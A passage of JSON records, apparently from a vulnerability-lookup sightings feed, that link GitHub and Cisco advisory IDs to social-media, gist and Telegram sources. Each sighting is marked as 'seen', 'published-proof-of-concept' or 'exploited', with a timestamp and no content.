"https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mr5r6mivxy24", "content": "", "creation_timestamp": "2026-07-21T12:01:41.338623Z"}, {"uuid": "31c48783-f36e-4a0a-bb6a-75b7ccdce491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7q8q-rj6j-mhjq", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mr5r6jabid2z", "content": "", "creation_timestamp": "2026-07-21T12:01:37.936482Z"}, {"uuid": "0c06621e-0f81-40f0-bd21-e7ed4873585b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42h9-826w-cgv3", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mr5r6g7tzv2g", "content": "", "creation_timestamp": "2026-07-21T12:01:34.808690Z"}, {"uuid": "60d26e66-5ba0-495f-bfe5-81a132fdfcac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gcfj-64vw-6mp9", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mr5r6e6l6b2h", "content": "", "creation_timestamp": "2026-07-21T12:01:32.979517Z"}, {"uuid": "f23bc63a-6486-4741-afd4-990737f5e1bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xj96-63gp-2gmr", "type": "seen", "source": "https://gist.github.com/alon710/a3a7380a4e0465c6c32d9063bd8033a6", "content": "", "creation_timestamp": "2026-07-21T12:31:41.631587Z"}, {"uuid": "baa3d02c-3f7f-48b5-9279-e742cd1f5fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fj2p-qj2f-74v5", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mr5vf2i2ek2c", "content": "", "creation_timestamp": "2026-07-21T13:16:52.290846Z"}, {"uuid": "d66666f4-2ff2-448f-80bb-e2212157da71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fv8q-rwj8-2c55", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mr5vc7infg2e", "content": "", "creation_timestamp": "2026-07-21T13:15:17.094183Z"}, {"uuid": "fcb2296c-fe3d-492f-b5cf-d0e1f201a51a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MP56-7VRW-QXVF", "type": "published-proof-of-concept", "source": "https://t.me/ckuRED/643", "content": "", "creation_timestamp": "2026-07-21T13:00:07.265371Z"}, {"uuid": "f684473d-ccd9-42ae-a650-695277272bc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62hf-57xw-28j9", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mr5tzyuull2j", "content": "", "creation_timestamp": "2026-07-21T12:52:48.073485Z"}, {"uuid": "37044391-5985-4db2-8699-88bf19e20514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pmwg-cvhr-8vh7", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mr5txabhww2x", "content": "", "creation_timestamp": "2026-07-21T12:51:15.182305Z"}, {"uuid": "11b4c12d-b17c-4db8-93b5-eadebf2f0c6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q5fw-vpqc-fgph", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mr5vhspcma2g", "content": "", "creation_timestamp": "2026-07-21T13:18:24.962578Z"}, {"uuid": "a2df4b48-ac12-4254-8504-d8e209bfcd59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2RP8-MM9Q-FP49", "type": "seen", "source": "https://gist.github.com/alon710/200e1b4ca9b1b66d608a6e02108ba259", "content": "", "creation_timestamp": "2026-07-22T08:31:19.319434Z"}, {"uuid": "5ded911c-f270-46d6-87e7-20eeab30f997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9wjq-cp2p-hrgf", "type": "seen", "source": "https://gist.github.com/alon710/cd896a69a4be919308bb443d6cb706e0", "content": "", "creation_timestamp": "2026-07-22T08:30:36.450398Z"}, {"uuid": "062639e0-54e2-4821-9ff0-efb1bf762e64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72hv-8253-57qq", "type": "seen", "source": "https://gist.github.com/alon710/a699a0ff594951c1548ee266a0f2d1af", "content": "", "creation_timestamp": "2026-07-22T09:31:57.403725Z"}, {"uuid": "87c97aa3-1215-44b6-85ce-76a90ca8b3fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R7WM-3CXJ-WFF9", "type": "seen", "source": "https://gist.github.com/alon710/a699a0ff594951c1548ee266a0f2d1af", "content": "", "creation_timestamp": "2026-07-22T09:31:57.364966Z"}, {"uuid": "f1436fea-7a7b-42ca-913d-7ad3cce557c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xj6q-8x83-jv6g", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrabmi3jbs2x", "content": "", "creation_timestamp": "2026-07-22T12:01:05.905938Z"}, {"uuid": "bb8e571f-f4db-4f67-a6fd-9a47a73de5e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pmv8-rq9r-6j72", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrabmge3db2g", "content": "", "creation_timestamp": "2026-07-22T12:01:03.971556Z"}, {"uuid": "b16a70c2-a2d7-436c-bbaf-d8f0004b663d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mwf2-3pr3-8698", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrabmenwc72g", "content": "", "creation_timestamp": "2026-07-22T12:01:02.799281Z"}, {"uuid": "52af61c6-e273-42fa-b1cd-face0d0fa151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mmx7-hfxf-jppx", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrabmdckvy24", "content": "", "creation_timestamp": "2026-07-22T12:01:01.081459Z"}, {"uuid": "d72b2cbe-8cdb-48e8-ae88-89e7117f927c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqh4-m9w3-8hp9", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrabmbavjt25", "content": "", "creation_timestamp": "2026-07-22T12:00:59.170299Z"}, {"uuid": "e332b44e-be63-42fc-9762-8c86e2f81610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hcpx-6fm6-wx23", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mrabm63qi42i", "content": "", "creation_timestamp": "2026-07-22T12:00:55.392904Z"}, {"uuid": "bce3b35d-b4a8-4bb6-a279-0d749d3bcb96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjwm-rvh2-c87w", "type": "seen", "source": "https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/", "content": "", "creation_timestamp": "2026-07-23T19:00:49.628930Z"}, {"uuid": "e9343b4d-60bf-4d91-a737-b747b6166527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/", "content": "", "creation_timestamp": "2026-07-23T19:00:49.579470Z"}, {"uuid": "3e43cf70-8bf6-4f9f-8b91-7d30ed902d5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcxm-7wvp-g6p5", "type": "seen", "source": "https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/", "content": "", "creation_timestamp": "2026-07-23T19:00:49.529119Z"}, {"uuid": "f6246b96-1b93-4a76-ae3c-623a5474f96c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-86CX-WWF4-PHQ4", "type": "seen", "source": "https://gist.github.com/alon710/341e4798332dfd78cba00be899ecacf7", "content": "", "creation_timestamp": "2026-07-25T15:32:47.096045Z"}, {"uuid": "418639b7-3194-4734-b98b-a4ce12d17028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P6PH-3JX2-3337", "type": "seen", "source": "https://gist.github.com/alon710/7ac48e75205a16d278d7edd78b6790dd", "content": "", "creation_timestamp": "2026-07-25T16:31:29.360562Z"}, {"uuid": "5dafa6c0-b2d4-4301-9a4f-2a1eb256e446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gpfc-h59v-63cv", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mrigld2ef32d", "content": "", "creation_timestamp": "2026-07-25T17:51:14.012639Z"}, {"uuid": "26a8662d-4fe3-4f15-9572-1f7e764830dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-95cv-r8x4-vh75", "type": "seen", "source": "https://gist.github.com/alon710/729285587ead72551cfda5647c8e9398", "content": "", "creation_timestamp": "2026-07-25T17:31:12.599343Z"}, {"uuid": "663b1220-495d-4a2a-a439-b42047edc958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7PPR-R889-MCF2", "type": "seen", "source": "https://gist.github.com/alon710/d38237d2a40144ae6c46815cd07e6744", "content": "", "creation_timestamp": "2026-07-25T18:31:07.881513Z"}, {"uuid": "13bfa415-f5af-4501-be09-2dcf7b4f6850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "seen", "source": "https://t.me/ZerodayAlert/665", "content": "", "creation_timestamp": "2026-07-26T00:00:36.738497Z"}, {"uuid": "3d7dfaa1-a24a-4c28-9e59-9b4f4accac5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170322-IOX", "type": "seen", "source": "https://t.me/KaitNews/3649", "content": "", "creation_timestamp": "2026-07-27T00:01:47.657292Z"}, {"uuid": "4082bf43-4648-40d0-8d06-7425dae8a1e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170405-AME", "type": "seen", "source": "https://t.me/KaitNews/3896", "content": "", "creation_timestamp": "2026-07-27T00:01:47.216258Z"}, {"uuid": "69b56768-1dcb-45d0-b6f9-6635d14ed3f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/KaitNews/7528", "content": "", "creation_timestamp": "2026-07-27T00:01:35.320609Z"}, {"uuid": "8a912043-ede6-41bc-99e4-c83abf8a8b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180409-SMI", "type": "seen", "source": "https://t.me/KaitNews/7703", "content": "", "creation_timestamp": "2026-07-27T00:01:35.003978Z"}, {"uuid": "3594ea1d-3ba4-449a-8180-4e57ecb6397b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-QOS", "type": "seen", "source": "https://t.me/KaitNews/7710", "content": "", "creation_timestamp": "2026-07-27T00:01:34.852019Z"}, {"uuid": "eaed8c62-388d-427d-a62b-fe1bc8bfee17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-84Q8-HPHJ-4R7W", "type": "seen", "source": "https://t.me/zhatez/1367", "content": "", "creation_timestamp": "2026-07-27T00:01:31.813672Z"}, {"uuid": "cc464fba-de12-44bc-825c-7821054b248f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4742-MR57-2R9J", "type": "published-proof-of-concept", "source": "https://t.me/cyberwarehouse/1047", "content": "", "creation_timestamp": "2026-07-27T00:00:33.939412Z"}, {"uuid": "008fd2dc-dea2-4f75-9db2-2e57b9e3239a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44JH-J22R-33WQ", "type": "published-proof-of-concept", "source": "https://t.me/EchelonEyes/1200", "content": "", "creation_timestamp": "2026-07-28T01:00:05.197166Z"}, {"uuid": "a440ed5b-9880-4c78-b5ed-242c9458d1d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "seen", "source": "https://t.me/brutsecurity/962", "content": "", "creation_timestamp": "2026-07-09T03:00:12.571284Z"}, {"uuid": "b0b32194-f046-4fea-a8c1-0e2c552badc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "seen", "source": "https://t.me/brutsecurity/962", "content": "", "creation_timestamp": "2026-07-10T00:00:36.425492Z"}, {"uuid": "1841efc8-b80e-4689-8d50-8592f7382958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-382C-VX95-W3P5", "type": "seen", "source": "https://gist.github.com/alon710/bf8c27e81f237e373da9208c021626d0", "content": "", "creation_timestamp": "2026-07-09T14:11:44.154387Z"}, {"uuid": "afe4018a-f3ec-4da2-a480-2b68f412c168", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-86VW-X4WW-X467", "type": "seen", "source": "https://gist.github.com/alon710/305f4c5d688e5f2ef3648a51ae29f792", "content": "", "creation_timestamp": "2026-07-09T15:11:49.059243Z"}, {"uuid": "aeb16fe5-11d9-497c-9d4a-427aabe553a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C43V-4CR8-6MVP", "type": "seen", "source": "https://gist.github.com/alon710/ffb181b33bedea772189a8193fac5697", "content": "", "creation_timestamp": "2026-07-09T15:42:12.657694Z"}, {"uuid": "88d8bccc-eaa3-40ed-ac16-93c6656ff652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52VM-MXX8-F227", "type": "seen", "source": "https://gist.github.com/alon710/de8daa287a86509961bb72f2223b1bc8", "content": "", "creation_timestamp": "2026-07-09T16:11:48.029090Z"}, {"uuid": "ffe11cd3-0ed2-47c7-88b2-649abaedd1df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-Q6GH-6V2R-HJV3", "type": "seen", "source": "https://gist.github.com/alon710/805d83c19fb4133434081d0b062a387f", "content": "", "creation_timestamp": "2026-07-09T16:41:48.852694Z"}, {"uuid": "9ad03b7b-c764-46c1-a34f-a602f848cffb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-387M-935M-C4VW", "type": "seen", "source": "https://gist.github.com/alon710/4972c27e69247db8e70c7471b199efc4", "content": "", "creation_timestamp": "2026-07-09T17:11:45.198574Z"}, {"uuid": "64c96aa5-c9f0-4b73-aa11-c6ea784a52ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XRMC-C5CG-RV7X", "type": "seen", "source": "https://gist.github.com/alon710/fc9075308a51fb0dcac943a4365a02d7", "content": "", "creation_timestamp": "2026-07-11T01:41:49.962400Z"}, {"uuid": "a24f723b-ce68-4b72-a4d0-a5cf712b7e88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qv4m-m73m-8hj7", "type": "seen", "source": "https://gist.github.com/alon710/0f714f8f5aa1155832cd576f5999e54b", "content": "", "creation_timestamp": "2026-07-11T02:11:58.952476Z"}, {"uuid": "03e23483-3ece-4c33-8cef-1945c06f62db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-99J7-FHR2-XFJ4", "type": "seen", "source": "https://gist.github.com/alon710/562c94e99a029c25882fbe479b6eb12d", "content": "", "creation_timestamp": "2026-07-11T03:12:22.963421Z"}, {"uuid": "bce13521-8918-49f5-8d7c-3176de7cc1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xqp3-jq6g-x3qm", "type": "seen", "source": "https://gist.github.com/alon710/3054e318d0e890a38da4e9f158827df1", "content": "", "creation_timestamp": "2026-07-11T03:42:32.097281Z"}, {"uuid": "3dc721e0-9583-40e0-9b9e-2e8a060d1016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hvr9-72v2-fff3", "type": "seen", "source": "https://gist.github.com/alon710/4e3f9aded7567695df7a9de4278d2ca5", "content": "", "creation_timestamp": "2026-07-11T04:12:19.326454Z"}, {"uuid": "23ac5b05-8024-4d2c-b8e6-4d3187303744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gcm7-57gf-953c", "type": "seen", "source": "https://gist.github.com/alon710/5b22d6c437eabc82b89ba6fa8ccee27d", "content": "", "creation_timestamp": "2026-07-11T04:41:43.079455Z"}, {"uuid": "c7b044fc-b953-4a49-8087-a99ac434d10b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W7XJ-8FX7-WFCH", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2387", "content": "", "creation_timestamp": "2026-07-11T11:00:04.794249Z"}, {"uuid": "8d940c53-782f-43a5-8bed-94880c4d6627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7229-Q9PV-J6P4", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2267", "content": "", "creation_timestamp": "2026-07-11T11:00:04.395861Z"}, {"uuid": "26875a7b-d423-4f0b-bd62-561724e4ffa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "exploited", "source": "https://t.me/brutsecurity/2189", "content": "", "creation_timestamp": "2026-07-11T11:00:04.262453Z"}, {"uuid": "5b918669-a39e-4e50-8ff9-930025c4bd25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HF5-MC28-XMCV", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2451", "content": "", "creation_timestamp": "2026-07-11T12:00:04.944976Z"}, {"uuid": "9635a09b-61d3-4f2e-b976-f93e11ac6857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QCJ2-99CG-MPPF", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2141", "content": "", "creation_timestamp": "2026-07-11T12:00:04.135056Z"}, {"uuid": "2947503d-4144-478d-93b6-f43970fc67cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67RR-84XM-4C7R", "type": "seen", "source": "https://t.me/brutsecurity/2040", "content": "", "creation_timestamp": "2026-07-11T12:00:03.768843Z"}, {"uuid": "ef0688d2-f723-4996-a129-38a85302abd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2R7G-8HPC-RPQ9", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/2046", "content": "", "creation_timestamp": "2026-07-11T12:00:03.697056Z"}, {"uuid": "7f43ab16-430a-4a27-8d26-9025111df1ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GW-9WW9-JMC3", "type": "exploited", "source": "https://t.me/brutsecurity/1837", "content": "", "creation_timestamp": "2026-07-11T13:00:05.459463Z"}, {"uuid": "11a28656-2cca-4e85-abd8-b437d803be3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GH-529W-V32X", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1611", "content": "", "creation_timestamp": "2026-07-11T14:00:04.447769Z"}, {"uuid": "cf67dd8e-11b4-4050-8f82-90b897d13878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73GX-X7R9-77X2", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1597", "content": "", "creation_timestamp": "2026-07-11T14:00:04.307405Z"}, {"uuid": "05c97a4e-cdc2-4d8a-93f3-6cb46a65f648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X684-96HH-833X", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1553", "content": "", "creation_timestamp": "2026-07-11T14:00:03.988147Z"}, {"uuid": "b79cbb88-e71b-42ed-b504-438c64608cb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-23C8-4WWR-G3C6", "type": "seen", "source": "https://t.me/brutsecurity/1466", "content": "", "creation_timestamp": "2026-07-11T15:00:05.699421Z"}, {"uuid": "d295f4ee-d584-40f5-a702-a46c8c02ac16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3W2C-JFR2-9PG9", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1432", "content": "", "creation_timestamp": "2026-07-11T15:00:05.459222Z"}, {"uuid": "e2712111-bed1-4b21-af57-1de013c63f6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7V-RGG6-548H", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1117", "content": "", "creation_timestamp": "2026-07-11T16:00:02.925061Z"}, {"uuid": "e38b2e15-7188-46e7-8e34-fb845107a289", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9298-4CF8-G4WJ", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/1052", "content": "", "creation_timestamp": "2026-07-11T16:00:02.872383Z"}, {"uuid": "e3c54c95-2193-48ab-8ced-bfbae8bc0bb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fj8f-m44g-c479", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqf5tmpidk2j", "content": "", "creation_timestamp": "2026-07-11T17:11:38.368276Z"}, {"uuid": "a96307f6-5ecc-49e1-bc1d-3415557fbc4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2xv2-w8cq-5gxw", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqf5o6os3s2j", "content": "", "creation_timestamp": "2026-07-11T17:08:35.367361Z"}, {"uuid": "3a4c0051-dd0a-4599-b258-2f9981edaa0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r899-h629-j84r", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqf5lh6gov2x", "content": "", "creation_timestamp": "2026-07-11T17:07:04.517817Z"}, {"uuid": "08e4af19-cd16-45c8-bfa4-b29f3953f9d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6FX6-WRPF-CPGV", "type": "seen", "source": "https://t.me/brutsecurity/1014", "content": "", "creation_timestamp": "2026-07-11T17:00:04.538955Z"}, {"uuid": "446fa6f3-0c93-46ce-bfeb-1d4b0c5d1eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WHXG-WX83-85P5", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/985", "content": "", "creation_timestamp": "2026-07-11T17:00:04.371722Z"}, {"uuid": 